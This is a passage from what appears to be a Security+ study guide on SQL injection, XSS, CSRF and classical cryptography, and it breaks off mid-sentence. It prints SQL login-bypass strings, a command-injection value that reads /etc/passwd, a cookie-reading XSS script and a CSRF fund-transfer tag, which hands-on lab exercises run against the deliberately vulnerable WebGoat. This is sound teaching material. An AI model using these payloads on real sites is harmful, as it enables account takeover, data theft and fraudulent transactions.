all in a controlled manner. Imagine a user-based web application that uses a simple script to call up all
information associated with an account. When Bob logs in with his password 'P@ssw0rd' (Bob isn't that good
at choosing passwords), the resulting SQL query will look something like this:
SELECT * FROM users WHERE name='Bob' AND password='P@ssw0rd';

Without special security measures, the server will assume any query it receives from the client is valid, and
pass it on to the database. In this case, the database sends all Bob's data as long as his password matches, and
refuses if it doesn't. This might seem secure, but it has a big vulnerability. In an SQL injection attack, an
attacker carefully crafts input from the browser to the web server, forming SQL commands that the page
would never generate in normal operation. Depending on the exact structure of the site this might involve
specialized tools, or it might just be a matter of typing just the right things into website fields or even the

browser address bar. Either way, since the server trusts the client's input, it's easily manipulated into doing
things that it shouldn't.
Now imagine that Craig wants to log into Bob's account and get his private information. He could try
guessing Bob's password, but he's learned about SQL and realizes he doesn't have to. He manipulates his
browser into sending the following command:
SELECT * FROM users WHERE name='Bob' AND password='' OR '1'='1';

The "OR '1'='1'" part inserts a condition that's always true, since 1 is always equal to 1. Trusting that the
web page was deliberately designed to send this query, the server retrieves Bob's information from the database, and
sends it to Craig's browser. Now Craig can read all of Bob's private messages without even knowing his
password. But then he gets even cockier. Why not log into the administrator's account by guessing what the
user name is?
SELECT * FROM users WHERE name='Admin' AND password='' OR '1'='1';

Even if he got the account name wrong, Craig could try again with 'Administrator' or 'root' or something, and
once he does he's achieved a privilege escalation attack by gaining access to any information and permissions
only the administrator has. But Craig still isn't done, and he sends one more SQL injection.
SELECT * FROM users WHERE name='' OR '1'='1' AND password='' OR '1'='1';

This bypasses both user name and password checks, requesting all information for all users.
Commerce websites are especially popular targets of SQL injection attacks, since they're obvious places to try
stealing products or customer financial information, but any server is at risk. Many of the largest and most
damaging data breaches of modern years were caused by attackers exploiting simple SQL vulnerabilities.

SQL injection techniques


SQL injection is a powerful tool, enough that a simple example of bypassing authentication doesn't really
encompass the damage it can do. By using different SQL commands, an attacker can accomplish any task
someone with direct access to the database can do: access and modify records, gain privileges, even delete the
entire database.
Injected queries don't even have to perform normal database tasks to help an attacker. The details of an error
message can reveal information about database structure or software functions, helping the attacker design a
better-targeted command. Other nonstandard queries can access shell commands on the server to create a
backdoor, or even enable remote code execution.
Since the web server, the database, and the programming languages connecting the two each can vary from
site to site, SQL injection attack and defense strategies vary according to the syntax and vulnerabilities of
each component. Hackers can put a lot of effort just into learning exactly what software they're attacking.
 Popular web servers include Apache, Nginx, and Microsoft-IIS.
 Popular SQL databases include Oracle, MySQL, and Microsoft SQL server.
 Popular programming frameworks include PHP, Ruby on Rails, ASP, and Python Django.

Regardless of the exact goals, attackers use a number of common techniques to perform SQL injections.
They're not all mutually exclusive: a given attack might include multiple strategies.


Unfiltered escape If an input field includes special characters used by SQL or the scripting language, they
characters might be taken as part of a command rather than as data. Well-designed applications use
escaping techniques to encase or substitute those characters so that they're clearly data
rather than commands. For instance, the apostrophe is used to surround strings in SQL,
so entering "O'Neill' in a name field could cause errors—instead, most software will
double the character and store the value as "O''Neill". If escape techniques for special
characters are poorly implemented or easily circumvented, attackers can inject code
into data fields.
Improper input Applications should check that any data inputs are of the right type, but they often don't
types do so reliably. If the application is too trusting, an attacker could for example enter a
string into a numeric data field either to generate a useful error or to alter the query.
Stacked queries Appending additional forged queries onto the original legitimate one. Without input
filtering, a semicolon tells SQL that the query is over and a new one is beginning. Since
the following query can be anything the attacker wants, it's a powerful technique when
it's executed.
Blind injection Securely designed production servers hide SQL error messages from end users in order
to prevent attackers from using them to gain information. In blind injection, attackers
use statements that should create verifiable changes in page output, or else perform
time-intensive operations and watch for server delay. Blind injection can be slow, but it
allows information gathering even on well-guarded servers.
Signature evasion Among other attacks, network intrusion detection systems often monitor web traffic for
signs of SQL injection. More sophisticated attacks carefully format queries to avoid
matching IDS signature files, while still working the same on the server.

Many web applications are vulnerable to SQL injection, and there's usually no good excuse for it. While
secure coding takes a careful and methodical approach, most of what allows injection attacks to work is pretty
simple to protect against. A secure web application does the following things:
 Sanitizes input by filtering or substituting dangerous characters that could modify SQL queries.
 Validates input by making sure all data is in the expected format before submitting it as a query.
 Restricts privileges both of users, and of the application itself, to limit the damage an injection can do.
 Restricts end-user error information to the minimum, preventing hackers from using error messages to
learn about server vulnerabilities.

Following all of these principles doesn't protect a web application against all vulnerabilities, but it undercuts
most of the tools attackers use against SQL.
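
To show what sanitizing and validating input can look like in code, the sketch below contrasts a query built by
string concatenation with a parameterized one, using Python's built-in sqlite3 module; the table, user, and
password are hypothetical.

# Vulnerable vs. parameterized queries (sqlite3; the table and data are hypothetical).
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Bob', 'P@ssw0rd')")

name, password = "Bob", "' OR '1'='1"   # attacker-supplied "password"

# Vulnerable: the input becomes part of the SQL statement itself.
unsafe = "SELECT * FROM users WHERE name='%s' AND password='%s'" % (name, password)
print(db.execute(unsafe).fetchall())    # returns Bob's row with no valid password

# Safer: placeholders keep the input as data, never as SQL syntax.
safe = "SELECT * FROM users WHERE name=? AND password=?"
print(db.execute(safe, (name, password)).fetchall())   # returns an empty list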


Other injection attacks


SQL is the most common and highest risk injection target, but it's not the only one. Several other technologies
can be targeted by injection: in fact, any time user-supplied data is sent to an interpreter as part of a command,
injection is theoretically possible. Likewise, the risk of any injection attack can be minimized by input
validation and other secure coding practices.

NoSQL injection Non-SQL or Not Only SQL is a term used for a variety of databases that have become
popular more recently. While SQL databases store data in fixed, relational tables,
NoSQL uses a variety of non-relational data models. While not suited for everything
SQL can do, NoSQL has strong performance advantages for the massive amounts of
data used in some web applications. It can also be easily scaled across multiple servers.
NoSQL uses different query languages than SQL, but the structure and vulnerabilities
tend to be quite similar.
LDAP injection Lightweight Directory Access Protocol is frequently used for network directory
services, such as accessing user names and passwords, corporate email directories,
system and network information, and so on. This makes it a natural fit for many web
applications, but just like SQL if it's not carefully secured an injection attack can make
off with all sorts of valuable data.
XML injection eXtensible Markup Language is a tagged markup language, designed to be both
human- and machine-readable. It's related to HTML, but more general-purpose, and is
used for all sorts of documents, databases, and other web application data storage.
While XML queries are much different from SQL queries, the principles and exploits
are similar.
Command injection When an application allows data to be passed to a command shell on the server, an
injection attack can execute operating system commands. Especially in conjunction
with directory traversal or privilege escalation, this isn't an attack against the
application or database, but a way into the server itself.
DLL injection Inserting code into a running process by forcing it to load executable code from a
shared library file, such as the dynamic-link library files used by Windows. This
injection can be used for privilege escalation or any other sort of unintended behavior.
DLL injection is frequently used as a malware vector or payload, but can also be
triggered for example by a buffer overflow attack against a web application.
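
The command injection entry above is easiest to see in code. The sketch below shows a lookup utility that
passes user input to a shell versus one that passes it as a plain argument list; the hostname string is a
hypothetical attacker input.

# Command injection sketch: shell=True lets crafted input become extra commands.
import subprocess

hostname = "example.com; cat /etc/passwd"   # hypothetical malicious input

# Vulnerable: the semicolon ends the ping command and starts the attacker's own.
# subprocess.run("ping -c 1 " + hostname, shell=True)

# Safer: passing arguments as a list means the input is only ever one argument.
subprocess.run(["ping", "-c", "1", hostname])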


Exercise: Examining SQL injection attacks


You should have just completed the "Exploring application vulnerabilities" exercise. If you have not, you'll need to
start the Dojo VM and launch WebGoat. In this exercise you'll demonstrate an SQL injection attack against
WebGoat.
Do This How & Why

1. Start an SQL injection lesson in WebGoat.
   WebGoat is a deliberately insecure web application OWASP uses to demonstrate application
   vulnerabilities.

a) In the left pane, click Injection Flaws.
   WebGoat contains several SQL injection vulnerabilities. You'll try a simple string injection.

b) Click Stage 1: String SQL Injection.
   WebGoat displays a login page.

2. Launch an SQL injection attack.

a) Examine the login page. It displays a list of employees as well as a password field.
You'll use an injection attack to log in without a password.

b) In Firefox, click Tools > SQL Inject Me > Open SQL Inject Me Sidebar.
   The SQL Inject Me browser sidebar opens. It's a tool meant to test injection vulnerabilities, but that
   also makes it an attack tool.

c) In WebGoat, select Neville Bartholomew from the user list.
   You'll use the attack tool to bypass the password.


d) In the Password field of the sidebar, select or type 1' OR '1'='1
   A vulnerable application will parse this as part of an SQL statement that says the password is valid
   if it is 1, or else if 1=1. In other words, it will always be true.

e) On the web page itself, click Login.
   You successfully log into the application as an administrator, displaying the staff listing page. A
   secure application would validate and sanitize input in a way that prevents this particular attack.

3. View staff information.

a) Select any employee in the list and click ViewProfile.
   By logging in as an administrator, you can view and edit each user's private information, including
   SSN and credit card number.

b) Close the SQL Inject Me window. Leave WebGoat open for the next exercise.


Client-side attacks
Traditionally, hackers focused on server-side attacks. Much like the old joke about robbing banks, servers are
where all the data is, so they're an obvious target. As common and damaging as attacks like SQL injection still
are, they're also becoming harder to do. More mature applications with strong security settings, protected by
specialized web application firewalls, just aren't as vulnerable as the early Web 2.0 servers of fifteen years
ago. Many hackers have responded by using client-side attacks designed to compromise the client
applications which connect to those servers, either to steal information directly from those users, or to get
legitimate users themselves to unwittingly manipulate server applications.
Client-side attacks can target vulnerabilities in any sort of application running on client computers. Web
browsers and browser add-ons are the most obvious targets, but email clients, instant messaging clients, office
applications, and media players are also at risk. Often they're used to inject malware, or malware is used to
create vulnerabilities for other attacks.
One of the most common types of client-side attack is the sort of content spoofing normally classified among
network or social engineering attacks. Phishing is a client-side attack that works by concealing the identity of
a fake URL or website from the user, either by just "looking right" or by actively circumventing browser
protections that would reveal its illegitimate nature. Pharming does the same at a lower level, by manipulating
the system hosts file or DNS server so that attempting to navigate to a legitimate site actually redirects the
user to a malicious one.


Elements used by client-side attacks include:

Application Any sort of application that communicates with the network can be targeted for attack.
vulnerabilities Even network services and lower levels of the TCP/IP stack on a client computer might
have potential vulnerabilities.
Browser add-ons Plugins and other add-ons intended to modify and expand browser capabilities can
themselves be exploited. Flash and Java are two examples of application environments
designed to run inside the browser: while both are intended to run their applications in
sandboxes isolated from the rest of the system, numerous exploits in both over the
years have allowed malicious programs, sometimes concealed in website ads or games,
to escape the sandbox and even execute arbitrary code on the client system.
Malicious add-ons If vulnerable add-ons weren't bad enough, users can be tricked into installing add-ons
which are malware in themselves. They might conceal their installation, or might
masquerade as helpful tools, but they allow attackers to manipulate browser behavior
or further compromise the system.
Cookies Browsers store small text files named cookies relevant to the websites a user visits.
Some are short-term, used for authentication and session identification purposes.
Others are longer-term, used to store website preferences or track browsing behavior.
Either can potentially be security or privacy risks, and to make things more
complicated, many websites won't work if cookies are disabled in the browser.
Local Shared Pieces of data stored on local computers by Flash applications. Sometimes called
Objects (LSO) Flash cookies, since they behave similarly to HTTP cookies. They can save settings or
track behavior, and older browsers had less ability to control or delete LSOs than
cookies.
Attachments Email attachments, and more broadly any files introduced onto the system, can
potentially carry viruses or other harmful content.

Cross-site scripting
One of the most common web attacks today is cross-site scripting, also known as XSS (to avoid confusion
with the non-malicious CSS, also used in browsers.) XSS is an injection attack, but instead of targeting the
server-side scripting languages like PHP or Python, it attacks the client-side scripting languages, like
JavaScript, which browsers use to render dynamic web pages. Broadly speaking, XSS is closely related to
content spoofing, but instead of serving up a page from a different site, the attacker inserts scripts into a page
sent from a legitimate site to a vulnerable third party. The victim's browser then runs the scripts, trusting them
just like it would any normal scripts from the server.

Exam Objective: CompTIA SY0-501 1.2.2.6


Since the victim's browser gives the injected scripts the same permissions it would legitimate scripts from the
same server, they can do anything the site itself could. While that usually doesn't mean full system access,
modern JavaScript is pretty powerful. Potential results include:
 Accessing the site's tracking cookies to steal user information
 Stealing session cookies to allow a session hijacking attack
 Reading or making arbitrary modifications to the contents of the page the script is running in
 Sending HTTP requests to arbitrary destinations
 Accessing other system resources the user has given the legitimate site permission to use, like webcams,
microphones, or local files


Since XSS targets the browsers of end users, it often includes a social engineering component. An XSS attack
might alter the page to prompt the user into entering credentials or other valuable data, or request access to
system resources for a seemingly legitimate reason. Other times, XSS quietly spies and steals, without the
user seeing anything visibly different. XSS is especially dangerous when it targets an administrator or other
superuser, since the attacker can steal administrative credentials.

XSS techniques
There are a variety of XSS techniques, but they're typically classified by just how the attack script interacts
with the server before it reaches the target's browser.

Stored The attacker somehow uploads the script to the server where it can be viewed as content on a
vulnerable web page. Usually it's placed somewhere any common user can add content: a
comment field, message forum, social media profile, or the like. It's also called a persistent
attack, since the page with the script can remain online indefinitely and affect anyone who
views it. Since it's persistent, and the attacker doesn't have to target anyone specific, stored
XSS vulnerabilities are the most serious kind.
Reflected The attacker places the script into a server request that will cause it to be displayed verbatim
on a web page. For example, an input might generate an error message showing exactly what
input caused it, or a search result might show the exact contents of the search field. Since it's
not placed permanently on the site, this is called a non-persistent attack; this also means that
the attacker needs some other way to get the target client to actually view it. Usually this
works by tricking the victim into clicking a malicious link, visiting a malicious site, or
submitting a specially designed form. Since they have to be targeted and typically rely on
social engineering as well as application vulnerabilities, reflected attacks are individually less
dangerous than stored attacks, but they're far more common.
DOM-based Traditional stored and reflected attacks both pass the malicious script through a legitimate
application server on the way to the target. DOM-based attacks never touch the server, but
take place entirely in the Document Object Model (DOM) browsers use to render content. For
example, like a reflected attack, a DOM-based attack might begin with a malicious link sent
to the target. The link points to the legitimate server, but instead of the script "bouncing" off
the server, it's loaded directly into the vulnerable browser and executed as though it were part
of the page all along. Unlike a traditional XSS attack, DOM-based attacks don't rely on
dynamic server pages: they can even "infect" static HTML.

Defenses against traditional XSS are partly similar to those against server-side injection techniques: data
sanitation and input validation can block many attacks, and intrusion prevention systems or web application
firewalls can detect and block suspicious JavaScript from being served to clients. Since DOM-based XSS
never touches the server, all defense techniques have to be performed on the client side: options include
client-side data validation, restricting cookie permissions, or even disabling scripts on sites that don't need
them.

Cross-site request forgery


A related but separate attack to XSS is Cross-Site Request Forgery (CSRF or XSRF). Like XSS, it's an attack
on a legitimate session between a web server and a user, but where XSS exploits the user's trust of the site,
XSRF exploits the site's trust of the user, forging or altering requests from the client to the server within the
context of the session.

Exam Objective: CompTIA SY0-501 1.2.2.7


In the classic XSRF attack, the user receives a link to an attacker's site. Hidden on the web page is code that
instructs the user's browser to make requests to another server where the user has an open session (including a
valid authentication cookie), using that user's permissions. For example, the XSRF attack could capture information

from the site to send to the attacker, or even change the user's password at the legitimate site, effectively
giving the account to the attacker.

Exercise: Examining client-side attacks


You should have just completed the "Examining SQL injection attacks" exercise. If you have not, you'll need
to start the Dojo VM and launch WebGoat. In this exercise you'll test a cross-site scripting attack against
WebGoat.
Do This How & Why

1. Start an XSS attack lesson.

a) On the left menu of WebGoat, click Cross-site scripting (XSS).

b) Click Stage 1: Stored XSS.

A login page appears with instructions on how to perform the attack.

c) Log into the page with user Tom Cat and password tom.

The staff listing page opens.

d) Click Tom's name, then click View Profile. To view the user profile page. You can update any of those
fields; since the application is full of vulnerabilities, you can even insert a malicious script into one.

2. Insert a script into Tom's user profile.

a) Click Edit Profile. The fields are all editable.

b) At the end of the Street field, type "><script>alert("I just hacked your session " + document.cookie)</script>
Be sure to type it exactly as shown, with all punctuation.


c) Click Update Profile. A message pops up with the result of that script.

d) Click OK twice, then Logout. You'll view Tom's profile from a different account.

3. View Tom's profile from Jerry's account.

a) Log in as Jerry Mouse. His password is jerry.

b) In Jerry's staff listing page, select Tom Cat, then click View Profile. The same popup message appears.
The XSS attack will affect anyone who views Tom's profile page.

c) Click OK twice.

4. Begin a CSRF lesson. You'll create a malicious page that uses the victim's browser
credentials to transfer funds on a banking site.

a) In the XSS category of the navigation pane, click Cross Site Request Forgery (CSRF). This page allows
you to send an email to a newsgroup, which can be read in a browser. It helpfully allows you to include
embedded images like on any web page.

b) Examine the Parameters section in the right pane. Take note of the Screen and menu values. You'll need
them in a moment.

c) In the Title field, type some appealing message title. As an attacker you'll want as many people to open
the message as possible.


d) In the Message field, type
<img src="http://localhost:8081/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=5000" width=1 height=1 />
Instead of XXX and YYY, use the Screen and menu values shown in your Parameters section.
Note: It's very easy to mess up the syntax of the attack code, so work on it in Notepad or
another text editor in case you need to enter it again.

This "image" actually commands the browser to initiate a fund transfer at the given site.

e) Click Submit.

At the bottom of the page a link to the message appears. Anyone subscribed to the same list would also see it.

5. Test the forged message. A CSRF attack relies on getting the victims to open a
malicious page. Once they do, the attack uses credentials in an
existing web application session to perform unwanted actions.

a) Click the message link. A real CSRF attack would pass on more detailed information
to the target application, but it would be just as invisible to the
victim.

The message opens. Since you set the source width and height
to 1 pixel, there isn't even a visibly missing image.

b) Verify that the lesson completed correctly. If it did, there will be a congratulations message at the top
of the page and a green check mark in the lesson name in the navigation pane. Otherwise, check the syntax
of your message and try again.

6. Close Firefox, then close the Dojo VM.


Assessment: Application attacks


1. An attack on your web application began with a long string of numbers sent to a field that's only supposed
to hold a four-digit variable. What kind of attack was it? Choose the best response.
 Buffer overflow
 Integer overflow
 LDAP injection
 XSRF

2. What application attacks directly target the database programs sitting behind web servers? Choose all that
apply.
 Command injection
 Cross-site scripting
 Session hijacking
 SQL injection
 XML injection

3. What SQL injection technique relies on unfiltered semicolons?


 Blind injection
 Signature evasion
 Stacked query
 XSRF

4. Blocking and cleaning Flash cookies is much the same as for any other browser cookies. True or false?
 True
 False

5. What XSS techniques don't require anything to actually be stored on the target server? Choose all that
apply.
 DOM based
 Persistent
 Reflective
 XSRF

6. What application vulnerability can be exploited by providing a series of normal data inputs with a specific
sequence and timing? Choose the best response.
 Buffer overflow
 Injection
 Race condition
 Request forgery


Summary: Understanding attacks


You should now know:
 How to categorize attackers by motivation and resources.
 About common types of social engineering, their underlying mechanisms, and how to protect against
them.
 How to identify malware according to its payload and transmission vector, as well as how malware
hides from detection.
 About common network attacks, including probes, spoofing, redirection, DoS, password cracking,
eavesdropping, MitM, and wireless.
 About web application attacks including injection, overflow, and scripting techniques.



Chapter 3: Cryptography
You will learn:
 About the primary types of cryptography, and algorithms in common use
 About public key infrastructure (PKI) technologies


Module A: Cryptography concepts


Cryptography is the science of sending messages in secret code, and it's been around almost as long as
writing: the first known encrypted text is an Egyptian inscription from 1900 B.C.E., using non-standard
hieroglyphs. Today, cryptography generally means transforming digital data with complex mathematical
formulas. Not only can cryptography be used to preserve the confidentiality of data, it can also be used to
guarantee its integrity, and verify the authenticity of its sender.
You will learn:
 About cryptographic principles
 About symmetric and asymmetric encryption
 About cryptographic hashing

About encryption
The use of cryptography to protect data confidentiality is encryption. The sender scrambles data with a
mathematical formula called an encryption algorithm, and a unique key which serves the same purpose as a
password. The intended viewer has the appropriate key to decrypt the message, but to an eavesdropper
without the key, the message looks like random gibberish.

The most common method for encrypting digital messages is called a cipher. It's a formula that takes
unencrypted plaintext and turns it into unreadable ciphertext of the same length. You can contrast this with an
encryption code, where the input and output can be of different lengths; for example, a letter where certain
key words have altered meanings.

Note: Plaintext and ciphertext don't have to be literally readable text. While ciphers once were used for
written words, in digital communications the terms apply equally to text, images, or any binary file.
Like any security, ciphers can be broken or compromised. First and most obviously, the algorithm of a cipher
isn't necessarily expected to remain secret, but the key is, so a key that can decrypt a message needs to be kept
out of the wrong hands. This means it shouldn't be shared carelessly, but also that it should be hard to guess.
Another problem is that plaintext is not random. Letters in a given language don't all appear at the same rate,
and the same words and letter patterns recur especially over long messages - if these patterns hold true of the
ciphertext, it might give the attacker useful clues about the key. An attacker might even know part of the
plaintext message already, and use it to test against possible solutions. The best algorithms create
pseudorandom ciphertext, where it's very difficult to find any patterns to it unless you have the key, even if
you know part of the plaintext already.

Note: In general, the strength of any cryptographic system is described in terms of work factor. In short,
that's how computationally difficult it is to break the encryption. That depends both on the algorithm,
and the choice of key. You can also describe it in terms of how long it would take to crack, but since
computing speeds vary between equipment and over time, that's a much more subjective term. A
particular challenge in cryptography is designing and choosing algorithms which have a high work
factor for an attacker, but which are high-performance from the perspective of a legitimate user.


Substitution ciphers
Modern digital cryptography uses very sophisticated ciphers, but you can understand a lot of their underlying
principles by looking at classical cryptography, ciphers used in the pre-computing era and written using
mechanical devices or just pen and paper. One basic category of classical cipher is the substitution cipher,
which simply replaces each character of a message with a different character. One of the simplest substitution
ciphers is called the Caesar cipher, so named because Julius Caesar used it for secret military correspondence.

Exam Objective: CompTIA SY0-501 6.2.6.2, 6.2.6.3


The Caesar cipher works by simply "rotating" each character through the order of the alphabet. In Caesar's
case it was three steps right in the Latin alphabet, but it's easy to do the same in English. It doesn't need to be
three places either: ROT13 is a popular modern version which rotates characters halfway, or 13 places,
through the English alphabet. To put it another way, Caesar cipher's algorithm is "rotation through the
alphabet", and the key is the number of places each character is moved.
Plaintext A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Caesar D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

ROT13 N O P Q R S T U V W X Y Z A B C D E F G H I J K L M

Plaintext All Gaul is divided into three parts


Caesar Doo Jdxo lv glylghg lqwr wkuhh sduwv

ROT13 Nyy Tnhy vf qvivqrq vagb guerr cnegf
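To make the mechanics concrete, here's a minimal Python sketch of the same idea; the function name caesar is
just illustrative, and shifting by 13 gives ROT13:

def caesar(text, shift):
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)          # leave spaces and punctuation alone
    return "".join(out)

print(caesar("All Gaul is divided into three parts", 3))   # Doo Jdxo lv glylghg lqwr wkuhh sduwv
print(caesar("All Gaul is divided into three parts", 13))  # Nyy Tnhy vf qvivqrq vagb guerr cnegf
print(caesar(caesar("secret", 13), 13))                    # rotating by 13 twice restores the original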

As you can probably tell, the Caesar cipher is very weak. You might have learned it as a childhood game, but
no one would use it for keeping serious secrets today even if a computer couldn't solve it trivially. ROT13 is
more often used for things like hiding the answer of a puzzle so you won't accidentally read it until you've
given up. Partly this is because there are only 25 possible keys, and partly because it does nothing to disguise
letter frequencies or patterns. To solve these two problems, you need more sophisticated ciphers.
One way to strengthen a substitution cipher is by changing the substitution key over the course of a message -
a process called key progression. This is called a polyalphabetic cipher, and can be much more effective. An
early example is the Vigenère cipher, which uses a keyword to look up values in a table composed of all
possible Caesar ciphers. A more complicated method was the Enigma machine developed in the 1920s and
used through World War II. Allied cryptologists famously broke the Enigma encryption used by the Germans,
but more due to operational errors and captured equipment than weaknesses in the algorithms themselves.
You can even use substitution principles to make a cipher that's provably unbreakable if it's implemented
correctly. It's not even that complex. The one-time pad (OTP) is a method where the plaintext message is
combined, character by character or bit by bit, with a key composed of a string of random numbers or letters
(the OTP). For example, the OTP could have a string of numbers corresponding to which Caesar cipher you
should use for that character. It could also be a string of binary digits to be combined in a mathematical XOR
operation with corresponding bits of the message.
Even though they're theoretically unbreakable you won't see OTPs used very often, since they have
demanding requirements. The OTP must be at least as long as the plaintext message, it must be entirely
random, it can never be reused, and it must be kept secret from everyone but the sender and recipient. Failing
at any of these makes the cipher vulnerable to attack. Consequently, OTP encryption is typically limited to
particularly specialized and high-risk communications, such as sensitive diplomatic or espionage purposes.


Transposition ciphers
In contrast with substitution ciphers, transposition ciphers leave the characters of the plaintext intact: they just
shuffle them around to leave the ciphertext unreadable. A simple example is the rail fence cipher, or zigzag
cipher. You can encrypt a message with a rail fence cipher by writing the plaintext letters in a zigzag fashion across multiple
lines of text, then assembling them into ciphertext order.
Plaintext Three may keep a secret, if two of them are dead.
Rail fence T---E---K---A---R---F---O---E---E---D
-H-E-M-Y-E-P-S-C-E-I-T-O-F-H-M-R-D-A-
--R---A---E---E---T---W---T---A---E--

Ciphertext TEKAR FOEED HEMYE PSCEI TOFHM RDARA EETWT AE
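For the curious, the zigzag logic is simple enough to express in a few lines of Python. This is an illustrative
sketch (the function name is invented for the example), and it reproduces the ciphertext shown above:

def rail_fence_encrypt(plaintext, rails=3):
    letters = [c for c in plaintext.upper() if c.isalpha()]
    rows = [[] for _ in range(rails)]
    rail, step = 0, 1
    for ch in letters:
        rows[rail].append(ch)
        if rail == rails - 1:
            step = -1               # bounce back up off the bottom rail
        elif rail == 0:
            step = 1                # bounce back down off the top rail
        rail += step
    return "".join("".join(row) for row in rows)

ct = rail_fence_encrypt("Three may keep a secret, if two of them are dead.")
print(" ".join(ct[i:i+5] for i in range(0, len(ct), 5)))
# TEKAR FOEED HEMYE PSCEI TOFHM RDARA EETWT AE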

More sophisticated transposition ciphers use more complex scrambling formulas, or multiple sequential ones.
Some use physical grilles that can be overlaid on a page of paper, which are moved in a pattern to reveal text
in the proper order.
Transposition ciphers can't be attacked based on character frequency, and in fact don't even hide how often
different characters are used. They also naturally break up common patterns and repetitions to some extent.
On the other hand, weak transposition ciphers have a whole different issue: a decryption key that is almost but
not quite correct will create an imperfect but partially legible result. This allows an attacker to more easily
make an initial guess and refine it later. By contrast, strong encryption algorithms ensure that even a slight
change in the key produces a completely different result.

Steganography
One problem with ciphers is that obviously encrypted messages can draw attention. This isn't always bad, at
least if your cipher and key are strong enough that no one will break it, but it at least means they know it's
there and can try. Governments or other authorities might forbid use of strong encryption; even if the
authority isn't malicious and your intent isn't criminal, this makes legitimate ciphers vulnerable to other
attackers. If an encrypted message seems valuable enough, an attacker could even physically threaten its
bearer into divulging the key. In other circumstances secrecy, such as encryption, can be seen as suspicious or
rude in itself.

Exam Objective: CompTIA SY0-501 2.2.9, 6.1.13, 6.1.28.6


Steganography is a form of cryptography that hides secret messages in seemingly innocuous information or
even out of sight entirely, so that a casual onlooker doesn't even know it's there. In classical cryptography,
steganographic messages are varied and creative; they include invisible ink written between lines of routine
messages, particular codewords or layout choices in a written message, pinpricks in paper, or even patterned
knots tied into yarn that's then woven into a garment.
Digital steganography uses analogous tricks to hide information in otherwise ordinary files. The methods
available depend on what the obvious message and file format are: a web page or other text-based document
for example could hide messages in metadata not visible when simply scanning through the document, or
even in plain sight by "blank lines" actually containing white text against a white background. For some file
formats, most viewers will simply disregard data that doesn't fit in; for example, by placing data in the right
order you can create a .jpg image file that will appear normally in a web browser or other image viewer, but
which also has .mp3 audio data which can be read by a media player just by changing the file extension.
These methods can be effective, but can suspiciously increase file size if done carelessly; they also can be
defeated easily by someone who knows where to look, especially if they know how to view the underlying
digital data.
Another popular method of steganography hides messages directly in the encoding of image or audio files.
Typically the bits used to encode a given pixel or sound sample aren't of equal importance. One pixel of a full

color RGB image is 24 bits: eight bits for red, eight for green, and eight for blue. If you take the least
significant bit from each color, in each pixel of the image, it will hardly change the look of the image at all:
even to a close analysis it might just look like a little imperfection or noise. That means assuming no
compression, for every 8 MB of images you can store up to 1 MB of secret message right in plain sight.
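The least-significant-bit idea can be sketched in a few lines of Python. This is purely illustrative: it treats a
byte string as stand-in "pixel" data rather than reading a real image file, and the function names are invented
for the example:

def embed(carrier, message):
    # Spread the message bits, most significant first, across the carrier's low bits
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0b11111110) | bit    # overwrite only the least significant bit
    return bytes(out)

def extract(carrier, length):
    bits = [b & 1 for b in carrier[:length * 8]]
    return bytes(sum(bit << (7 - i) for i, bit in enumerate(bits[n:n + 8]))
                 for n in range(0, len(bits), 8))

pixels = bytes(range(200))                      # stand-in for raw pixel bytes
stego = embed(pixels, b"hi")
assert extract(stego, 2) == b"hi"               # the message comes back out
assert max(abs(a - b) for a, b in zip(pixels, stego)) <= 1   # each byte changes by at most 1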

The right-hand image holds a hidden message.

Sometimes the security goal of steganography is to make sure that the message is visible and unalterable.
Color laser printers and copiers use a form of steganography by encoding the time and printer serial number
in fine dots invisible to the untrained eye but easily read by scanning software. Intended originally to stop the
spread of counterfeit currency, it can also be used to find the source of a document that was printed or
distributed without permission. This method was used in the discovery and arrest of a US government
contractor who leaked classified information in mid-2017.
With any form of steganography, the hidden message itself can be encrypted, or it can rely on its hidden
nature for confidentiality. Since steganography is an example of security through obscurity the latter is less
secure; then again, steganography is sometimes used where the discovery of a secret message in itself would
be as dangerous as revealing the message contents.

Note: Unlike other forms of digital encryption, steganography isn't used by most people on a daily basis,
and tools for it aren't built into most operating systems and secure protocols. For people who need to
hide the existence of sensitive data as well as its contents, there are a variety of free and open source
tools such as Steghide, OpenPuff, and OpenStego. For those seeking to find data hidden by
steganography, steganalysis tools include StegSecret, StegExpose, or simply using the same tools used
to hide it.


Digital encryption
It's an understatement to say that the rise of computing transformed cryptography. Obviously digital storage
and data networks changed the format of data messages, but the constantly advancing power of computers in
the 20th century also made it trivial to break most classical ciphers. At the same time, the growth of data
networks made encryption a more valuable tool than ever. Instead of only spies and diplomats really needing
to go through such lengths, everyone today regularly transmits their passwords, banking information, and
personal correspondence over networks and to devices which would otherwise be vulnerable to all sorts of
eavesdroppers.

Exam Objective: CompTIA SY0-501 6.1.28.4, 6.1.28.5, 6.1.28.7


Digital encryption can be categorized in many ways. One way to classify it is by the current state of the data you
need to protect.

Transport Protects data in transit, such as that being sent over the network. Since data in transit is at
encryption the greatest risk of being exposed to attack, transport encryption is popular for secure
network protocols.
Storage Protects data at rest, which is on some sort of persistent storage medium. Storage
encryption encryption can protect individual files, such as documents or databases; it can also protect
entire storage devices, such as hard drives or backup archives. It's not as ubiquitous as
transport encryption, but is commonly used in secure systems.
Memory Protects data in use, such as that in system RAM or even that being currently processed.
encryption Memory encryption is challenging to implement without hurting performance and
interoperability, but it's increasingly desirable to organizations with strict security needs.
Cryptographic Protects the code of a program itself from those who would try to reverse engineer it,
obfuscation without changing its functions. Unlike storage or memory encryption, obfuscation affects
the source code of the program itself. Obfuscation of some sort or another is often used by
malware trying to hide itself from scanners, but the concept also has value in solving many
other problems in software security. Cryptographically secure obfuscation that will work
for all programs has been mathematically proven to be impossible, but there are ongoing
advancements in obfuscation that's strong enough to give meaningful protection in at least
some cases.

Another way you can classify digital cryptography is by how the algorithm acts on the data.

Symmetric Uses a single key to encrypt and decrypt data. Also known as secret-key or private key
encryption cryptography, since it provides confidentiality but only as long as the key is kept secret.
Asymmetric Uses two mathematically-related keys: data encrypted with one can only be decrypted
